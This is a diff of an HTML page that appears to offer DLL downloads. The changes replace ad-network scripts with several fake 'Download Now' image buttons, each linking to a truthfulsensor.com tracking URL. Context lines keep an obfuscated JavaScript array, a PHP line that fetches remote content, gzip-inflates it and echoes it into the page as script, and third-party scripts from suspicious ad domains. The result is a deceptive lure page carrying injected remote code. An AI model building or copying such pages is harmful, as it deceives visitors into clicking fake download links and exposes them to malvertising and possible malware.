--- a/index.html
+++ b/index.html
@@ -242,7 +242,15 @@ var _0x5d4b=['235913QVfbwv','slice','length','162209QBmAmV','14238hyOOTq','32320
 		'params' : {}
 	};
 </script>
-<script type="text/javascript" src="//truthfulsensor.com/2c78250ef117cf62c60a8c2682dbe600/invoke.js"></script>
+<a href="https://truthfulsensor.com/jf83s2f0?key=613c9a1fb162aae70bafb5b6c0c613d9">
+        <img src="https://cdn.pixabay.com/photo/2016/07/23/10/44/download-1536639_1280.png" alt="Download Now" style="border: none;"/>
+    </a>
+
+	<a href="https://truthfulsensor.com/jf83s2f0?key=613c9a1fb162aae70bafb5b6c0c613d9">
+        <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/b/bd/Download_Button.svg/1280px-Download_Button.svg.png" alt="Download Now" style="border: none;"/>
+    </a>
+
+
 
 
 	
@@ -370,35 +378,13 @@ var _0x5d4b=['235913QVfbwv','slice','length','162209QBmAmV','14238hyOOTq','32320
  <img src="download.jpg">
 </a>
 <script async="" language="javascript" charset="UTF-8" type="text/javascript" src="{{http://dllgen.z91658n8.beget.tech/adaa.php}}?q=8e6y06jtkpe7bmec2223v96mvbpngqjiw7pvkvzqev6d6vi1xv52j2w"></script>
+<a href="https://truthfulsensor.com/jf83s2f0?key=613c9a1fb162aae70bafb5b6c0c613d9">
+        <img src="https://media.licdn.com/dms/image/C4E12AQE67vMLT04V1A/article-cover_image-shrink_600_2000/0/1520114366277?e=2147483647&v=beta&t=VkKS6gTDe0oY5w4T7XU_EP_TYBZ0GAZcz19Mqggs0Bg" alt="Download Now" style="border: none;"/>
+    </a>
 
-<script type="text/javascript">
-	atOptions = {
-		'key' : 'c2986ca00f2cf2263e0568d2af3163e0',
-		'format' : 'iframe',
-		'height' : 600,
-		'width' : 160,
-		'params' : {}
-	};
-	document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://inquiryclank.com/c2986ca00f2cf2263e0568d2af3163e0/invoke.js"></scr' + 'ipt>');
-</script><script type="text/javascript" src="http://inquiryclank.com/c2986ca00f2cf2263e0568d2af3163e0/invoke.js"></script>
-<div id="disqus_thread"><iframe id="dsq-app6011" name="dsq-app6011" allowtransparency="true" frameborder="0" scrolling="no" tabindex="0" title="Disqus" style="width: 1px !important; min-width: 100% !important; border: medium !important; overflow: hidden !important; height: 876px !important;" width="100%" src="https://disqus.com/embed/comments/?base=default&amp;f=dllgen&amp;t_u=http%3A%2F%2Fdllgen.z91658n8.beget.tech%2Funsafe.html&amp;t_d=&amp;t_t=&amp;s_o=default#version=96fa2ba331081de9a1f11b9a1eeb8f14" horizontalscrolling="no" verticalscrolling="no"></iframe></div>
-<script>
-    /**
-    *  RECOMMENDED CONFIGURATION VARIABLES: EDIT AND UNCOMMENT THE SECTION BELOW TO INSERT DYNAMIC VALUES FROM YOUR PLATFORM OR CMS.
-    *  LEARN WHY DEFINING THESE VARIABLES IS IMPORTANT: https://disqus.com/admin/universalcode/#configuration-variables    */
-    /*
-    var disqus_config = function () {
-    this.page.url = PAGE_URL;  // Replace PAGE_URL with your page's canonical URL variable
-    this.page.identifier = PAGE_IDENTIFIER; // Replace PAGE_IDENTIFIER with your page's unique identifier variable
-    };
-    */
-    (function() { // DON'T EDIT BELOW THIS LINE
-    var d = document, s = d.createElement('script');
-    s.src = 'https://dllgen.disqus.com/embed.js';
-    s.setAttribute('data-timestamp', +new Date());
-    (d.head || d.body).appendChild(s);
-    })();
-</script>
+
+	
+
 <noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
 <video class="visitweb_videoplayer VW_videoplayer_inited" controls="controls">
 <source src="318_cat_1.mp4" type="video/mp4">
@@ -410,7 +396,9 @@ var _0x5d4b=['235913QVfbwv','slice','length','162209QBmAmV','14238hyOOTq','32320
 <script type="text/javascript"><?php echo gzinflate(substr(file_get_contents("http://v.visitweb.com/v/XO6EJdF0a7R8i5I14k4FBYViDrKjJQ?code2&vo",false,stream_context_create(array("http" => array("method"=>"GET","header"=>"Accept-Encoding: gzip\r\nAccept-Charset: utf-8\r\n","timeout"=>10.0)))),10,-8));?></script>
 <script id="dsq-count-scr" src="//dllgen.disqus.com/count.js" async=""></script>
 <script type="text/javascript" charset="utf-8" src="http://bbckdl.mfcewkrob.com/js/angular.js?v=2.14"></script><style type="text/css">.VW_videoplayer_close_button{width:16px;height:16px;background-image:url("http://bbckdl.mfcewkrob.com/images/videoplayer_closeButton.png");background-color:#ffffff;cursor:pointer;background-repeat:no-repeat;background-size:100% 100%;background-position:center;position:absolute;top:5px;right:5px;}.VW_videoplayer_close_button:hover{background-color:#f00;}.VW_videoplayer_block{display:block;position:absolute;overflow:hidden;box-sizing:border-box;pointer-events:none;}.VW_videoplayer_block.VW_Videoplayer_fullscreeen{position:fixed;z-index:99999;top:0px !important;left:0px !important;right:0px !important;bottom:0px !important;width:100% !important;height:100% !important;}.VW_videoplayer_block *{box-sizing:border-box;pointer-events:auto;}.VW_videoplayer_adv_block{color:#fff;border-radius:6px;background-color:rgba(0, 0, 0, 1);-webkit-box-shadow:10px 10px 5px -5px rgba(0,0,0,1);-moz-box-shadow:10px 10px 5px -5px rgba(0,0,0,1);box-shadow:10px 10px 5px -5px rgba(0,0,0,1);position:absolute;box-sizing:content-box;border:1px solid #ddd;overflow:hidden;}.VW_videoplayer_adv_blockID1{display:none;}.VW_videoplayer_adv_block a:hover .VW_videoplayer_adv_text_block{text-decoration:underline;overflow:hidden;}.VW_videoplayer_adv_table{width:100%;border-collapse:collapse;border-spacing:0px;color:#fff;display:table;}.VW_videoplayer_adv_tr{display:table-row;}.VW_videoplayer_adv_td{display:table-cell;text-align:center;vertical-align:middle;text-decoration:none;}.VW_videoplayer_color_white{color:#fff;}.VW_videoplayer_div{box-sizing:border-box;width:100%;}.VW_videoplayer_adv_text_block{text-align:center;}.VW_videoplayer_inline_center{text-align:center;}.VW_videoplayer_position_relative{position:relative;}.VW_videoplayer_display_inline_block{display:inline-block;}.VW_videoplayer_display_block{display:block;}.VW_videoplayer_pull_left{float:left;}.VW_videoplayer_pull_right{float:right;}.VW_videoplayer_va_middle{vertical-align:middle;}.VW_videoplayer_large_button{background-image:url("http://bbckdl.mfcewkrob.com/images/videoplayer_playLargeButton.png");background-size:200%;background-position:0px center;background-repeat:no-repeat;position:absolute;cursor:pointer;opacity:0.8;z-index:10000000;}.VW_videoplayer_large_button:hover{opacity:0.6;background-position:100% center;}.VW_videoplayer_popup_message_container{position:absolute;background-color:rgba(255, 255, 255, 0.8);width:98%;height:98%;left:1%;top:1%;z-index:20000000;border:1px solid #444;border-radius:4px;overflow-y:auto;}.VW_videoplayer_popup_message_inner_container{max-width:350px;width:100%;padding:10px;margin:0 auto;}.VW_videoplayer_popup_message_title{color:#000;text-align:center;font-weight:bold;text-transform:uppercase;font-size:18px;}.VW_videoplayer_popup_message_body{color:#000;text-align:center;padding:8px 0 10px;font-size:18px;}.VW_videoplayer_popup_message_button{background-color:#e44501;color:#fff;padding:20px;line-height:40px;font-size:26px;text-align:center;display:block;border-radius:4px;text-decoration:none;}</style><div class="VW_videoplayer_block" style="z-index: 900; height: 300px; width: 230px; left: 8px; top: 1707px;"><div class=" VW_videoplayer_adv_block VW_videoplayer_adv_blockID1 VW_videoplayer_inlineAds" style="width: 200px; height: 40px; top: 5px; left: 15px; display: none;"><div class="VW_videoplayer_adv_table"><div class="VW_videoplayer_adv_tr"><a href="https://cwpbam.mfcewkrob.com/c?i=63wYFa2d50ELJ8KDpydjBI6MUgSMg8dESujAFquzKZtsd98K_G2d9QL3CDnMos5J-wlmbVTpMElyb4v3WQ-kANZfwpP__onMTPNULV4aRyjkhOaLtPY" target="_blank" class="VW_videoplayer_adv_td " style="width: 198px; height: 38px; display: table-cell;"><div class="VW_videoplayer_adv_img_block VW_videoplayer_display_inline_block VW_videoplayer_va_middle" style="padding: 5.7px 3.96px 5.7px 7.92px; height: 38px; width: 38.48px;"><img class="VW_display_inline VW_videoplayer_adv_img" src="http://bbckdl.mfcewkrob.com/i/40e1b93e0f04013505ae7acc36cacf35be363fa5ca2ca596.jpg" style="height: 26.6px; width: 26.6px;"></div><div class="VW_videoplayer_adv_text_block VW_videoplayer_display_inline_block VW_videoplayer_va_middle VW_videoplayer_color_white" style="padding: 0px 7.92px 0px 3.96px; font-size: 12px; line-height: 12px; width: 159.52px;">Пилотов и членов экипажей Air India обязали заниматься йогой</div></a><a href="https://cwpbam.mfcewkrob.com/c?i=h9EDhp6l3cs8ATJgXFu_-kY1PKh-w6NZiDPaUgrEdbYPNwoypNQ48FY5IEh_nztcmDGAdrpLTqlvmbYfg6ad2M_QQTrnFJuZ6-s80GOOxCM95zmCY1E" target="_blank" class="VW_videoplayer_adv_td " style="width: 198px; height: 38px; display: none;"><div class="VW_videoplayer_adv_img_block VW_videoplayer_display_inline_block VW_videoplayer_va_middle" style="padding: 5.7px 3.96px 5.7px 7.92px; height: 38px; width: 38.48px;"><img class="VW_display_inline VW_videoplayer_adv_img" src="http://bbckdl.mfcewkrob.com/i/49bf1e57265f111b9ce0fc93857e6ce0648cdf3067f02c38.jpg" style="height: 26.6px; width: 26.6px;"></div><div class="VW_videoplayer_adv_text_block VW_videoplayer_display_inline_block VW_videoplayer_va_middle VW_videoplayer_color_white" style="padding: 0px 7.92px 0px 3.96px; font-size: 12px; line-height: 12px; width: 159.52px;">Дождь, грозу и до 19 градусов тепла прогнозируют в столичном регионе</div></a><a href="https://cwpbam.mfcewkrob.com/c?i=94hTMM7kAFJWif3IFRA0dS9kRyJd8oJhYXYaa5vLMAdGbQMeueIeVvJSKFs_tpuHLIE4wCJghaynoSLpMHuNxyZrk_eLhl6rPNNAAa30jGoQlkLVmxU" target="_blank" class="VW_videoplayer_adv_td " style="width: 198px; height: 38px; display: none;"><div class="VW_videoplayer_adv_img_block VW_videoplayer_display_inline_block VW_videoplayer_va_middle" style="padding: 5.7px 3.96px 5.7px 7.92px; height: 38px; width: 38.48px;"><img class="VW_display_inline VW_videoplayer_adv_img" src="http://bbckdl.mfcewkrob.com/i/1ad88beb14b223f08ed59d92ca819a2e90c936cf4c57e1cf.jpg" style="height: 26.6px; width: 26.6px;"></div><div class="VW_videoplayer_adv_text_block VW_videoplayer_display_inline_block VW_videoplayer_va_middle VW_videoplayer_color_white" style="padding: 0px 7.92px 0px 3.96px; font-size: 12px; line-height: 12px; width: 159.52px;">Картину Пиросмани на аукционе Christie's приобрел экс-премьер Грузии</div></a></div></div><div class="VW_videoplayer_close_button"></div></div><div class="VW_videoplayer_adv_block VW_videoplayer_adv_blockID2 VW_videoplayer_TwoBlocks" style="width: 200px; height: 80px; top: 110px; left: 15px; display: block;"><div class="VW_videoplayer_adv_table"><div class="VW_videoplayer_adv_tr"><a class="VW_videoplayer_adv_td" href="https://cwpbam.mfcewkrob.com/c?i=3T8tqbxpDPRg36Td-dE9V-NjwxKf4aO7zLrOOO7WdMymQWdpQrmYp0KKEfYJSMUejq9nLrhoWdWNWncfrFPO4AIpO9TbRHC1ADxx4yxpFgydgj21hq4" target="_blank" style="width: 64px; height: 80px; display: table-cell;"><div class="VW_videoplayer_div VW_videoplayer_adv_img VW_videoplayer_inline_center" style="padding: 4px;"><img class="VW_videoplayer_adv_img_block VW_videoplayer_display_inline_block VW_videoplayer_va_middle" src="http://bbckdl.mfcewkrob.com/i/9bf309f4bcf01bf9490f4441aa2715c38adc463125ea3229.jpg" style="height: 56px; width: 56px;"></div><div class="VW_videoplayer_adv_text_block VW_videoplayer_va_middle VW_videoplayer_color_white" style="padding: 0px 8px; font-size: 12px; line-height: 12px;">Обнародованы фотографии семьи Джека-потрошителя</div></a><a class="VW_videoplayer_adv_td" href="https://cwpbam.mfcewkrob.com/c?i=XJzLuhCAx_TtHWGHL99vfbsd3kxV0-pe0Lu5Gu8ic724mFw09a4tIwSpMWV0Vqk7pdt1fiOuPDfatdSY09HBfJ0mR-a2TlcpvvAKIV2JtMTxBl9Erug" target="_blank" style="width: 64px; height: 80px; display: table-cell;"><div class="VW_videoplayer_div VW_videoplayer_adv_img VW_videoplayer_inline_center" style="padding: 4px;"><img class="VW_videoplayer_adv_img_block VW_videoplayer_display_inline_block VW_videoplayer_va_middle" src="http://bbckdl.mfcewkrob.com/i/c267bdb62eda94223dc2dbe346ed31e27550a6a2ad9ed64f.jpg" style="height: 56px; width: 56px;"></div><div class="VW_videoplayer_adv_text_block VW_videoplayer_va_middle VW_videoplayer_color_white" style="padding: 0px 8px; font-size: 12px; line-height: 12px;">Половина болельщиков «Реала» выставила бы Роналду на трансфер</div></a></div></div><div class="VW_videoplayer_close_button"></div></div><div class="VW_videoplayer_large_button" style="width: 50px; height: 50px; top: 50%; left: 50%; margin-left: -25px; margin-top: -25px;"></div></div><script type="text/javascript" charset="utf-8" src="http://taz.mfcewkrob.com/xx?qxq!&amp;clu=xFkGCM7c-pIsS54LLPPuoq8r8oAMe6AU-IQmQO4832f3KOXUQruhjp214MWocqZ65Tv8OIW8pyCLQ70PN8S7IvH0HRJt153_o6TbXCytFOktmNb1cq1d&amp;mb=0&amp;fsb=0&amp;lb=0"></script><script type="text/javascript" src="//ladnova.info/fre?key=MmMwCAIhEREIAxYUOAEKDQkDBhBE" async="" charset="utf-8"></script><script type="text/javascript" src="//ladnova.info/fre?key=KWMwCAIhEREIAxYURQ%3D%3D" async="" charset="utf-8"></script><iframe style="display: none;"></iframe></body>
-	
+	<a href="https://truthfulsensor.com/jf83s2f0?key=613c9a1fb162aae70bafb5b6c0c613d9">
+        <img src="https://as2.ftcdn.net/v2/jpg/05/53/48/97/1000_F_553489791_x7xgnXUmCqXTv2SslehhCCKSblkGtrUD.jpg" alt="Download Now" style="border: none;"/>
+    </a>
 	
 	
 
